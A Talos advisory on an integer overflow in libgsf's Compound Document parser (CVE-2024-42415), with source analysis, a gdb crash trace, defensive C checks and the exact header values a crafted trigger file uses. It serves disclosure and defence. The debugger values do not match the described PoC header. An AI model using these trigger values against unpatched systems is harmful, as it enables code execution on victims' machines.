Talos Vulnerability Report

TALOS-2024-2069

GNOME Project G Structured File Library (libgsf) Compound Document Binary File Sector Allocation Table integer overflow vulnerability

October 3, 2024
CVE Number

CVE-2024-42415

SUMMARY

An integer overflow vulnerability exists in the Compound Document Binary File format parser of v1.14.52 of the GNOME Project G Structured File Library (libgsf). A specially crafted file can result in an integer overflow that allows for a heap-based buffer overflow when processing the sector allocation table. This can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

GNOME Project G Structured File Library (libgsf) 1.14.52
GNOME Project G Structured File Library (libgsf) commit 634340d31177c02ccdb43171e37291948e7f8974

PRODUCT URLS

G Structured File Library (libgsf) - https://gitlab.gnome.org/GNOME/libgsf.git

CVSSv3 SCORE

8.4 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-190 - Integer Overflow or Wraparound

DETAILS

The G Structured File Library (libgsf) is a GNOME project whose goal is to provide an abstraction layer around different structured file formats. The library supports common archive formats such as tar and zip, as well as other formats such as the compound document file format. libgsf is used by a number of applications to extract data from the supported formats, including Gnumeric, GNOME Commander, AbiWord, and the tracker-miners service. The tracker-miners service is especially important because it automatically indexes and parses all files found under the user’s home directory without user interaction.

This vulnerability specifically involves the way the G Structured File Library (libgsf) parses the compound document binary file format. The format is designed as a container that can store multiple streams of information, similar to an archive. Within the container, a directory holding naming information for each document component is stored so that the streams it contains can be identified. This design allows a writer of the format to manipulate individual streams without interfering with other applications that may be accessing the same file. This capability is provided by organizing the contents with a file allocation table and a layer of indirection that references said allocation table. The file allocation table is a linked list describing which sectors are chained together, so each directory entry references its contents by specifying the sector in the file allocation table at which its chain starts. It is also worth noting that there are two types of sectors within the file format, regular sectors and minisectors, and that the sizes of both are stored in the document header. For more information on this file format, please review Microsoft’s documentation at https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-cfb/53989ce4-7b05-4f8d-829b-d08d6148375b.
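
To illustrate the linked-list idea, the following is a minimal C sketch of following a sector chain through an in-memory file allocation table. It assumes the table has already been loaded into an array of 32-bit entries and uses the MS-CFB ENDOFCHAIN value 0xFFFFFFFE; the function name cfb_chain_length is hypothetical and not part of libgsf.

```c
#include <stddef.h>
#include <stdint.h>

#define CFB_ENDOFCHAIN 0xFFFFFFFEu /* MS-CFB end-of-chain marker */

/* Hypothetical helper: count the sectors in the chain that begins at
 * `start`. Returns -1 if the chain references a sector outside the
 * table or is longer than the table itself (which implies a cycle). */
static long cfb_chain_length(const uint32_t *fat, size_t fat_len, uint32_t start)
{
    size_t steps = 0;
    uint32_t sect = start;

    while (sect != CFB_ENDOFCHAIN) {
        if (sect >= fat_len || steps >= fat_len)
            return -1;            /* out-of-range index or cyclic chain */
        sect = fat[sect];         /* follow the link to the next sector */
        steps++;
    }
    return (long)steps;
}
```

A valid chain visits each sector at most once, so a chain longer than the table can only occur if it loops; the step counter therefore doubles as a cycle check.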

After a consumer of the libgsf library has opened a file using the compound document binary file format, the gsf_infile_msole_new function will be used as an entry point to parse the file’s contents. This function allocates a GsfInfileMSOle structure to contain the information necessary to parse the compound document file. At [1], the ole_init_info function will be called to read the header for the file format.

gsf/gsf-infile-msole.c:971-993
GsfInfile *
gsf_infile_msole_new (GsfInput *source, GError **err)
{
    GsfInfileMSOle *ole;
    gsf_off_t calling_pos;

    g_return_val_if_fail (GSF_IS_INPUT (source), NULL);

    ole = (GsfInfileMSOle *)g_object_new (GSF_INFILE_MSOLE_TYPE, NULL);
    ole->input = gsf_input_proxy_new (source);
    gsf_input_set_size (GSF_INPUT (ole), 0);

    calling_pos = gsf_input_tell (source);
    if (ole_init_info (ole, err)) {                                     // [1] Initialize tables to parse file
        /* We do this so other kinds of archives can be tried.  */
        (void)gsf_input_seek (source, calling_pos, G_SEEK_SET);

        g_object_unref (ole);
        return NULL;
    }

    return GSF_INFILE (ole);
}

Once inside the ole_init_info function, the implementation starts by verifying the signature of the file at [2]. Afterwards, at [3], each of the fields composing the header is loaded into variables local to the function’s scope. As mentioned earlier, the compound document binary file format stores its sector sizes within the header. These sizes are stored as a power of 2 (or “shift”). After reading the sector sizes, at [4] the function verifies that the sector size is within a specific range (64 - 1073741824, i.e. a shift of 6 through 30), that the minisector shift is not larger than the sector shift, and that the file is large enough to hold at least one sector. However, according to Microsoft’s documentation, the sector shift must be either 9 (512) or 12 (4096), depending on the major version in the header.

gsf/gsf-infile-msole.c:492-669
static gboolean
ole_init_info (GsfInfileMSOle *ole, GError **err)
{
    static guint8 const signature[] =
        { 0xd0, 0xcf, 0x11, 0xe0, 0xa1, 0xb1, 0x1a, 0xe1 };
    guint8 *seen_before;
    guint8 const *header, *tmp;
    guint32 *metabat = NULL;
    MSOleInfo *info;
    guint32 bb_shift, sb_shift, num_bat, num_sbat, num_metabat, threshold, last, dirent_start;
    guint32 metabat_block, *ptr;
    gboolean fail;

    /* check the header */
    if (gsf_input_seek (ole->input, 0, G_SEEK_SET) ||                           
        NULL == (header = gsf_input_read (ole->input, OLE_HEADER_SIZE, NULL)) ||    // [2] Check the signature in the header
        0 != memcmp (header, signature, sizeof (signature))) {
...
    }

    bb_shift      = GSF_LE_GET_GUINT16 (header + OLE_HEADER_BB_SHIFT);              // [3] Read the sector shift (sector size)
    sb_shift      = GSF_LE_GET_GUINT16 (header + OLE_HEADER_SB_SHIFT);              // [3] Read the minisector shift (minisector size)
    num_bat	      = GSF_LE_GET_GUINT32 (header + OLE_HEADER_NUM_BAT);               // [3] Read the number of sectors for the file allocation table
    num_sbat      = GSF_LE_GET_GUINT32 (header + OLE_HEADER_NUM_SBAT);              // [3] Read the number of sectors for the mini file allocation table
    threshold     = GSF_LE_GET_GUINT32 (header + OLE_HEADER_THRESHOLD);             // [3] Read the stream threshold (mini)
    dirent_start  = GSF_LE_GET_GUINT32 (header + OLE_HEADER_DIRENT_START);          // [3] Read the starting sector of the directory
    metabat_block = GSF_LE_GET_GUINT32 (header + OLE_HEADER_METABAT_BLOCK);         // [3] Read the starting sector containing the indirection table
    num_metabat   = GSF_LE_GET_GUINT32 (header + OLE_HEADER_NUM_METABAT);           // [3] Read the number of sectors containing the indirection table
...
    /* Some sanity checks
     * 1) There should always be at least 1 BAT block
     * 2) It makes no sense to have a block larger than 2^31 for now.
     *    Maybe relax this later, but not much.
     */
    if (6 > bb_shift || bb_shift >= 31 || sb_shift > bb_shift ||                    // [4] Validate the sector sizes
        (gsf_input_size (ole->input) >> bb_shift) < 1) {                            // [4] Validate the sector sizes
        if (err != NULL)
            *err = g_error_new (gsf_input_error_id (), 0,
                        _("Unreasonable block sizes"));
        return TRUE;
    }
...
    return FALSE;
}
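
For comparison, a minimal C sketch of the stricter check implied by Microsoft’s documentation is shown below. It assumes a 512-byte header buffer and reads the major version at offset 0x1A and the two shifts at offsets 0x1E and 0x20 as little-endian 16-bit values, accepting only a sector shift of 9 for version 3 or 12 for version 4, with a minisector shift of 6. The helper names are hypothetical; this is not the check libgsf performs.

```c
#include <stdbool.h>
#include <stdint.h>

/* Read a little-endian 16-bit value from a byte buffer. */
static uint16_t read_le16(const uint8_t *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

/* Hypothetical validator: checks the shifts in a CFB header against
 * MS-CFB. Version 3 requires a sector shift of 9, version 4 requires
 * a shift of 12, and the minisector shift must always be 6. */
static bool cfb_shifts_are_valid(const uint8_t header[512])
{
    uint16_t major      = read_le16(header + 0x1A);
    uint16_t shift      = read_le16(header + 0x1E);
    uint16_t mini_shift = read_le16(header + 0x20);

    if (mini_shift != 6)
        return false;
    if (major == 3)
        return shift == 9;
    if (major == 4)
        return shift == 12;
    return false;             /* unknown major version */
}
```

Under this rule, the proof-of-concept header described later in this report (sector shift 16, minisector shift 8) would be rejected before any allocation table is sized.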

Once the fields have been read from the header and the sector sizes validated, the function will allocate space for the info local variable. After being allocated, the implementation will store the fields required to read the indirection table and its file allocation table. At [5], the function will use the sector “shift” read from the header to calculate the size of an individual sector, and store it into the info variable. The vulnerability being described specifically involves this sector size. At [6], the same calculation will be made with the minisector “shift” before storing it to the corresponding field of the info variable. At [7], the fields containing the dimensions of the minisector file allocation table will also be stored to info.

gsf/gsf-infile-msole.c:492-669
static gboolean
ole_init_info (GsfInfileMSOle *ole, GError **err)
{
...
    MSOleInfo *info;
...
    info = g_new0 (MSOleInfo, 1);
    ole->info = info;

    info->ref_count	     = 1;
    info->bb.shift	     = bb_shift;                                                                            // [5] Store sector "shift"
    info->bb.size	     = 1 << info->bb.shift;                                                                 // [5] Convert sector shift to size
    info->bb.filter	     = info->bb.size - 1;
    info->sb.shift	     = sb_shift;                                                                            // [6] Store minisector "shift"
    info->sb.size	     = 1 << info->sb.shift;                                                                 // [6] Convert minisector shift to size
    info->sb.filter	     = info->sb.size - 1;
    info->threshold	     = threshold;
    info->sbat_start     = GSF_LE_GET_GUINT32 (header + OLE_HEADER_SBAT_START);                                 // [7] Start of minisector fat
    info->num_sbat       = num_sbat;                                                                            // [7] Number of sectors for minisector fat
    info->max_block	     = (gsf_input_size (ole->input) - OLE_HEADER_SIZE + info->bb.size -1) / info->bb.size;
    info->sb_file	     = NULL;

...
    return FALSE;
}
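
The arithmetic performed at [5] and [6], together with the max_block estimate, can be sketched in standalone C as follows. The struct and function names are hypothetical, the header size is assumed to be 512 (0x200) bytes as described in the proof-of-concept section, and the shift is assumed to have already passed the 6 to 30 range check at [4].

```c
#include <stdint.h>

#define HEADER_SIZE 512u   /* assumed value of OLE_HEADER_SIZE (0x200) */

/* Hypothetical mirror of the bb/sb fields stored in the info structure. */
struct block_geometry {
    uint32_t shift;   /* log2 of the sector size */
    uint32_t size;    /* sector size in bytes: 1 << shift */
    uint32_t filter;  /* mask selecting the offset within a sector */
};

/* Derive size and filter from a shift, as done at [5] and [6]. */
static struct block_geometry make_geometry(uint32_t shift)
{
    struct block_geometry g;
    g.shift  = shift;
    g.size   = 1u << shift;
    g.filter = g.size - 1;
    return g;
}

/* Number of sectors following the header, rounded up, matching the
 * info->max_block expression. Assumes file_size >= HEADER_SIZE. */
static uint64_t max_block(uint64_t file_size, uint32_t sector_size)
{
    return (file_size - HEADER_SIZE + sector_size - 1) / sector_size;
}
```

For example, a shift of 16, as used by the proof-of-concept, yields a sector size of 0x10000 and a filter of 0xffff.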

After the info structure has been populated, the following code is encountered. At [8], the ole_init_info function validates the number of sectors for the file allocation table (and for the minisector file allocation table) against the size of the file. Next, the file allocation table is allocated in order to store the sector indices that compose it. The number of entries is calculated at [9] by dividing the sector size by the size of an entry (4) and multiplying the result by the number of sectors read from the header. This count is then used to perform the allocation at [10]. Because the result is stored in the info->bb.bat.num_blocks field, which is of type guint32, the product at [9] can be made to overflow and is truncated to 32 bits, resulting in an undersized allocation at [10]. After allocating space for the file allocation table, the address of the allocated memory is passed to ole_info_read_metabat at [11].

gsf/gsf-infile-msole.c:492-669
static gboolean
ole_init_info (GsfInfileMSOle *ole, GError **err)
{
...
    guint32 *metabat = NULL;
    MSOleInfo *info;
    guint32 bb_shift, sb_shift, num_bat, num_sbat, num_metabat, threshold, last, dirent_start;
    guint32 metabat_block, *ptr;
...

    /* very rough heuristic, just in case */
    if (num_bat < info->max_block && info->num_sbat < info->max_block) {            // [8] Check number of sectors (regular and mini) against file
        info->bb.bat.num_blocks = num_bat * (info->bb.size / BAT_INDEX_SIZE);       // [9] Multiply number of sectors by sector size
        info->bb.bat.block	= g_new0 (guint32, info->bb.bat.num_blocks);            // [10] Allocate entries for file allocation table

        metabat = g_try_new (guint32, MAX (info->bb.size, OLE_HEADER_SIZE));
        if (!metabat) {
...
        }

        /* Reading the elements invalidates this memory, make copy */
        gsf_ole_get_guint32s (metabat, header + OLE_HEADER_START_BAT,
            OLE_HEADER_SIZE - OLE_HEADER_START_BAT);
        last = num_bat;
        if (last > OLE_HEADER_METABAT_SIZE)
            last = OLE_HEADER_METABAT_SIZE;

        ptr = ole_info_read_metabat (ole, info->bb.bat.block,                       // [11] Read sectors from indirection table into undersized buffer.
            info->bb.bat.num_blocks, metabat, metabat + last);
        num_bat -= last;
    } else
        ptr = NULL;

...
    return FALSE;
}
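
The overflow at [9] can be reproduced and guarded against in isolation. The sketch below is not the vendor’s patch: it computes the entry count the same way, with the result reduced to 32 bits as happens when it is stored in the guint32 num_blocks field, and separately shows an overflow-checked variant. The function names are hypothetical, and BAT_INDEX_SIZE is taken to be 4 as stated above.

```c
#include <stdbool.h>
#include <stdint.h>

#define BAT_INDEX_SIZE 4u  /* bytes per allocation table entry */

/* Same expression as [9]: the product wraps modulo 2^32. */
static uint32_t num_blocks_unchecked(uint32_t num_bat, uint32_t sector_size)
{
    return num_bat * (sector_size / BAT_INDEX_SIZE);
}

/* Hypothetical checked variant: returns false instead of wrapping. */
static bool num_blocks_checked(uint32_t num_bat, uint32_t sector_size,
                               uint32_t *out)
{
    uint32_t per_sector = sector_size / BAT_INDEX_SIZE;

    if (per_sector != 0 && num_bat > UINT32_MAX / per_sector)
        return false;                 /* product would exceed 32 bits */
    *out = num_bat * per_sector;
    return true;
}
```

With the values seen in the debugger session below (0x801 sectors of 0x800000 bytes), the unchecked form yields 0x200000 entries, while the checked form rejects the input because 0x801 exceeds UINT32_MAX / 0x200000.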

The following is the implementation of the ole_info_read_metabat function. When libgsf opens the provided proof-of-concept, the bats parameter points to the undersized buffer. At [12], the function enters a loop that uses the indirection table to locate each sector that composes the file allocation table. Each referenced sector is then read, and at [13] every entry in it is copied into the bats array, which is advanced after each write; if an indirection entry is marked as unused, the same number of entries is filled with BAT_MAGIC_UNUSED instead. Because the memory for the file allocation table is undersized, these writes result in a heap-based buffer overflow. Under certain conditions, this can result in code execution within the context of the application using the library.

gsf/gsf-infile-msole.c:201-232
static guint32 *
ole_info_read_metabat (GsfInfileMSOle *ole, guint32 *bats, guint32 max_bat,
               guint32 const *metabat, guint32 const *metabat_end)
{
    guint8 const *bat, *end;

    for (; metabat < metabat_end; metabat++) {                          // [12] Enter loop to read the indirection table
        if (*metabat != BAT_MAGIC_UNUSED) {
            bat = ole_get_block (ole, *metabat, NULL);
...
            end = bat + ole->info->bb.size;
            for ( ; bat < end ; bat += BAT_INDEX_SIZE, bats++) {
                *bats = GSF_LE_GET_GUINT32 (bat);                       // [13]
...
            }
        } else {
            /* Looks like something in the wild sometimes creates
             * 'unused' entries in the metabat.  Let's assume that
             * corresponds to lots of unused blocks
             * http://bugzilla.gnome.org/show_bug.cgi?id=336858 */
            unsigned i = ole->info->bb.size / BAT_INDEX_SIZE;
            while (i-- > 0)
                *bats++ = BAT_MAGIC_UNUSED;                             // [13]
        }
    }
    return bats;
}
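
The copy at [13] trusts that bats has room for bb.size / BAT_INDEX_SIZE entries for every indirection-table entry. A bounded version of the same copy could look like the sketch below. copy_bat_sector and its parameters are hypothetical, and the sketch only models decoding one sector into the array, not libgsf’s sector lookup.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define BAT_INDEX_SIZE 4u

/* Hypothetical bounded copy: decode one sector of little-endian 32-bit
 * entries into `bats`, starting at index *used. Fails without writing
 * if the destination, whose capacity is `cap` entries, cannot hold the
 * whole sector. Callers must keep *used <= cap. */
static bool copy_bat_sector(uint32_t *bats, size_t cap, size_t *used,
                            const uint8_t *sector, size_t sector_size)
{
    size_t count = sector_size / BAT_INDEX_SIZE;

    if (count > cap - *used)
        return false;
    for (size_t i = 0; i < count; i++) {
        const uint8_t *p = sector + i * BAT_INDEX_SIZE;
        bats[*used + i] = (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
                          ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
    }
    *used += count;
    return true;
}
```

Checking the remaining capacity before the loop, rather than inside it, means a sector that does not fit is rejected as a whole and no partial write occurs.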

Crash Information

The following excerpt uses the gdb(1) debugger to debug the tools/gsf binary that comes with libgsf. After the debugger has loaded, a temporary breakpoint is set on the “main” function.

$ gdb -q --args ./gsf list filename
Catchpoint 1 (exec)
Catchpoint 2 (fork)
Catchpoint 3 (vfork)
No symbol table is loaded.  Use the "file" command.
Make breakpoint pending on future shared library load? (y or [n]) [answered N; input not from terminal]
Reading symbols from ./gsf...

(gdb) tbreak main
Temporary breakpoint 4 at 0x402470: file gsf.c, line 518.

(gdb) r
Starting program: /tracker-miners/libgsf/tools/.libs/gsf list filename
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".

Temporary breakpoint 4, main (argc=0x3, argv=0x7fffffffcff8) at gsf.c:518
518             GError *error = NULL;
Missing separate debuginfos, use: dnf debuginfo-install bzip2-libs-1.0.8-18.fc40.x86_64 libblkid-2.40.1-1.fc40.x86_64 libffi-3.4.4-7.fc40.x86_64 libmount-2.40.1-1.fc40.x86_64 libselinux-3.6-4.fc40.x86_64 libxml2-2.12.8-1.fc40.x86_64 pcre2-10.44-1.fc40.x86_64 xz-libs-5.4.6-3.fc40.x86_64 zlib-ng-compat-2.1.7-1.fc40.x86_64

When the debugger resumes control, two breakpoints are set before continuing execution of the target process. The first breakpoint is on the line containing the integer overflow. The second breakpoint is on the line that calls the function that writes to the undersized array.

(gdb) b gsf/gsf-infile-msole.c:571
Breakpoint 5 at 0x1555554f1e52: file gsf-infile-msole.c, line 571.
(gdb) b gsf/gsf-infile-msole.c:590
Breakpoint 6 at 0x1555554f1fee: file gsf-infile-msole.c, line 590.
(gdb) c
Continuing.

Upon resuming execution, the first breakpoint is hit. The next three instructions calculate the product of the number of sectors specified in the header and the number of entries per sector. Dumping the memory referenced by the source operand of the first instruction shows the sector size 0x800000. After stepping over this instruction, the value is stored in the %rdi register.

Breakpoint 5, ole_init_info (ole=0x41a870 [GsfInfileMSOle], err=0x0) at gsf-infile-msole.c:571
571                     info->bb.bat.num_blocks = num_bat * (info->bb.size / BAT_INDEX_SIZE);

(gdb) x/3i $pc
=> 0x1555554f1e52 <gsf_infile_msole_new+882>:   mov    0x18(%r8),%rdi
   0x1555554f1e56 <gsf_infile_msole_new+886>:   shr    $0x2,%rdi
   0x1555554f1e5a <gsf_infile_msole_new+890>:   imul   %r13d,%edi

(gdb) dd $r8+0x18 L1
41a958 | 00800000 | ....

(gdb) stepi
0x00001555554f1e56      571                     info->bb.bat.num_blocks = num_bat * (info->bb.size / BAT_INDEX_SIZE);

(gdb) p $rdi
$1 = 0x800000

The next instruction, shr, divides the value by 4 by shifting it right by 2 bits. Stepping over this instruction leaves 0x200000 in the %rdi register. Next is the signed multiplication instruction that is responsible for the integer overflow. It multiplies the %edi register by the %r13d register (the number of sectors, 0x801) and stores the 32-bit result back into %edi. Some quick math shows that the true product does not fit in 32 bits and is therefore truncated.

(gdb) stepi
0x00001555554f1e5a      571                     info->bb.bat.num_blocks = num_bat * (info->bb.size / BAT_INDEX_SIZE);

(gdb) p $rdi
$2 = 0x200000

(gdb) p $r13d
$4 = 0x801

(gdb) p $r13d*$edi
$5 = 0x200000

(gdb) p (uint64_t)$r13d*$edi
$6 = 0x100200000

(gdb) next
572                     info->bb.bat.block      = g_new0 (guint32, info->bb.bat.num_blocks);

After the multiplication has executed, the truncated result is passed as a parameter to the g_new0 function to allocate memory. Once g_new0 returns, the address of the allocation is stored in the %rax register. We then resume execution until the next breakpoint is encountered, which is where the library will write to the memory that was just allocated.

(gdb) p $rax
$9 = 0x155546600010

(gdb) next
574                     metabat = g_try_new (guint32, MAX (info->bb.size, OLE_HEADER_SIZE));

The next time the debugger returns control to us, we will be at the call to the ole_info_read_metabat function. After stepping into it, we can see that the "bats" parameter contains the address of the undersized array that was allocated. At this point we can continue the program and wait for the ole_info_read_metabat function to write to the memory pointed to by the "bats" parameter.

(gdb) c
Continuing.

Breakpoint 6, ole_init_info (ole=0x41a870 [GsfInfileMSOle], err=0x0) at gsf-infile-msole.c:590
590                     ptr = ole_info_read_metabat (ole, info->bb.bat.block,

(gdb) step
ole_info_read_metabat (ole=ole@entry=0x41a870 [GsfInfileMSOle], bats=0x155546600010, max_bat=0x200000, metabat=metabat@entry=0x155544400010, metabat_end=0x1555444001c4)
    at gsf-infile-msole.c:207
207             for (; metabat < metabat_end; metabat++) {
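
The values visible at this point are enough to quantify the overflow. The short C sketch below is a worked calculation, not part of libgsf; compute_overflow is a hypothetical name. It takes the bats, max_bat, metabat, and metabat_end values printed by the debugger, plus the 0x800000 sector size read earlier, and computes where the allocation ends and how many entries the loop at [12] will try to store.

```c
#include <stdint.h>

#define BAT_INDEX_SIZE 4u

/* Worked numbers for the overflow (hypothetical helper). */
struct overflow_math {
    uint64_t alloc_end;       /* first address past the bats buffer */
    uint64_t metabat_count;   /* indirection entries walked at [12] */
    uint64_t entries_written; /* entries the loop at [13] stores */
};

static struct overflow_math compute_overflow(uint64_t bats, uint32_t max_bat,
                                             uint64_t metabat,
                                             uint64_t metabat_end,
                                             uint32_t sector_size)
{
    struct overflow_math m;
    m.alloc_end       = bats + (uint64_t)max_bat * BAT_INDEX_SIZE;
    m.metabat_count   = (metabat_end - metabat) / BAT_INDEX_SIZE;
    m.entries_written = m.metabat_count * (sector_size / BAT_INDEX_SIZE);
    return m;
}
```

With these inputs the allocation ends at 0x155546e00010, the loop walks 109 indirection entries, and it attempts to store 0xda00000 entries into a buffer sized for 0x200000. In other words, the first indirection entry alone fills the buffer, and every subsequent write lands past its end.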

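Immediately after continuing execution, the ole_info_read_metabat function writes data past the end of the undersized “bats” array. This results in signal 11 being dispatched to the process, which manifests itself as a SIGSEGV segmentation fault. The fault occurs inside memset with %al set to 0xff, which is consistent with the BAT_MAGIC_UNUSED fill loop at [13] having been compiled into a memset call. The original destination saved in %rdx (0x155546e00010) is exactly 0x800000 bytes past the start of the “bats” array (0x155546600010), that is, the end of the allocation.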

(gdb) finish
Run till exit from #0  ole_info_read_metabat (ole=ole@entry=0x41a870 [GsfInfileMSOle], bats=0x155546600010, max_bat=0x200000, metabat=metabat@entry=0x155544400010, 
    metabat_end=0x1555444001c4) at gsf-infile-msole.c:207

Program received signal SIGSEGV, Segmentation fault.
__memset_avx2_unaligned_erms () at ../sysdeps/x86_64/multiarch/memset-vec-unaligned-erms.S:330
330             rep     stosb

(gdb) h

-=[registers]=-
[rax: 0x00000000000000ff] [rbx: 0x00001555444001c4] [rcx: 0x00000000007ff010]
[rdx: 0x0000155546e00010] [rsi: 0x00000000000000ff] [rdi: 0x0000155546e01000]
[rsp: 0x00007fffffffcd88] [rbp: 0x0000000000200000] [ pc: 0x0000155554f19bca]
[ r8: 0x00001555444001c4] [ r9: 0x00000000ffffffff] [r10: 0x0000000000000000]
[r11: 0x0000155554f19b00] [r12: 0x000000000041a870] [r13: 0x0000000000800000]
[r14: 0x0000155544400014] [r15: 0x0000155546e00010] [efl: 0x00010206]
warning: right shift count >= width of type
[flags: -ZF -SF -OF -CF -DF +PF -AF +IF RF R1]

-=[stack]=-
7fffffffcd88 | 00001555554f2ecf 000000000040ea3c | ..OUU...<.@.....
7fffffffcd98 | 0000000000417c70 0000000000000801 | p|A.............
7fffffffcda8 | 0000155544400010 0000000000000000 | ..@DU...........
7fffffffcdb8 | 000000000041a870 000000000000006d | p.A.....m.......

-=[disassembly]=-
   0x155554f19bc0 <__memset_avx2_unaligned_erms+192>:   movzbl %sil,%eax
   0x155554f19bc4 <__memset_avx2_unaligned_erms+196>:   mov    %rdx,%rcx
   0x155554f19bc7 <__memset_avx2_unaligned_erms+199>:   mov    %rdi,%rdx
=> 0x155554f19bca <__memset_avx2_unaligned_erms+202>:   rep stos %al,%es:(%rdi)
   0x155554f19bcc <__memset_avx2_unaligned_erms+204>:   mov    %rdx,%rax
   0x155554f19bcf <__memset_avx2_unaligned_erms+207>:   vzeroupper
   0x155554f19bd2 <__memset_avx2_unaligned_erms+210>:   ret

Exploit Proof of Concept

To create the malformed file, run the proof-of-concept with Python, passing the desired document filename. Once generated, the file is ready to be parsed and can be opened with the library using either the gsf tool or by explicitly calling the gsf_infile_msole_new function.

$ python poc.py3.zip somefilename
...
$ stat somefilename

The first sector (0x200 bytes) of the generated file contains the entirety of the header for the compound document. Within the header, two fields are multiplied in order to produce the mentioned integer overflow.

<class storage.File> 'unnamed_14f9133a2630' {unnamed=True}
[0] <instance storage.Header 'Header'> (little) 0xd0cf11e0a1b11ae1 version=3.62 clsid={00000000-0000-0000-0000-000000000000}
[1e] <instance storage.HeaderSectorShift 'SectorShift'> uSectorShift=16 (0x10000) uMiniSectorShift=8 (0x100)
[22] <instance ptype.block 'reserved'> (6) "\x00\x00\x00\x00\x00\x00"
[28] <instance storage.HeaderFat 'Fat'> sectDirectory=ENDOFCHAIN(0xfffffffe) csectDirectory=0 csectFat=262145 dwTransaction=0x00000000
[38] <instance storage.HeaderMiniFat 'MiniFat'> ulMiniSectorCutoff=4096 sectMiniFat=ENDOFCHAIN(0xfffffffe) csectMiniFat=0
[44] <instance storage.HeaderDiFat 'DiFat'> sectDifat=ENDOFCHAIN(0xfffffffe) csectDifat=0
[4c] <instance storage.DIFAT 'Table'> storage.DIFAT.IndirectPointer[109] .............................................................................................................
[200] <instance ptype.block 'padding(Table)'> ...
[200] <instance FileSectors 'Data'> _object_[0] ""

At offset 0x1e of the file is the sector “shift”. The sector “shift” is a power of 2 that determines the size of an individual sector. The library allows this value to range from 6 to 30, resulting in a sector size from 0x40 to 0x40000000.

<class storage.HeaderSectorShift> 'SectorShift'
[1e] <instance storage.USHORT 'uSectorShift'> 0x0010 (16)
[20] <instance storage.USHORT 'uMiniSectorShift'> 0x0008 (8)

At offset 0x2c of the file is the number of sectors used to compose the file allocation table.

<class storage.HeaderFat> 'Fat'
[28] <instance storage.DWORD 'csectDirectory'> 0x00000000 (0)
[2c] <instance storage.DWORD 'csectFat'> 0x00040001 (262145)
[30] <instance storage.SECT(Pointer._object_, SECT._calculate_) 'sectDirectory'> ENDOFCHAIN(0xfffffffe)
[34] <instance storage.DWORD 'dwTransaction'> 0x00000000 (0)

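If the number of sectors at offset 0x2c multiplied by the number of 4-byte entries per sector (the sector size derived from offset 0x1e, divided by 4) does not fit in 32 bits, this vulnerability is triggered. For the values above, 262145 * (0x10000 / 4) = 0x100004000, which is truncated to 0x4000.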
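
A defensive check for this condition can be sketched in C: read the sector shift at offset 0x1e and the number of allocation table sectors at offset 0x2c from the 512-byte header, then test whether the entry count computed at [9] would exceed 32 bits. The function names are hypothetical, and the check only looks for this specific overflow; it is not a general validator for the format.

```c
#include <stdbool.h>
#include <stdint.h>

/* Little-endian field readers for a CFB header buffer. */
static uint32_t le16_at(const uint8_t *h, unsigned off)
{
    return (uint32_t)h[off] | ((uint32_t)h[off + 1] << 8);
}

static uint32_t le32_at(const uint8_t *h, unsigned off)
{
    return le16_at(h, off) | (le16_at(h, off + 2) << 16);
}

/* Hypothetical detector: true if csectFat * (sector size / 4) does not
 * fit in 32 bits, i.e. the header would produce the truncated count. */
static bool header_triggers_bat_overflow(const uint8_t header[512])
{
    uint32_t shift   = le16_at(header, 0x1E);
    uint32_t num_bat = le32_at(header, 0x2C);

    if (shift < 6 || shift > 30)
        return false;           /* libgsf rejects these shifts at [4] */
    uint64_t entries = (uint64_t)num_bat * ((1ull << shift) / 4);
    return entries > UINT32_MAX;
}
```

Computing the product in 64 bits avoids the very truncation being detected; for the proof-of-concept header the result is 0x100004000, which exceeds UINT32_MAX.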

VENDOR RESPONSE

Fixed in 1.14.53

TIMELINE

2024-09-03 - Vendor Disclosure
2024-09-03 - Initial Vendor Contact
2024-10-01 - Vendor Patch Release
2024-10-03 - Public Release

Credit

Discovered by a member of Cisco Talos.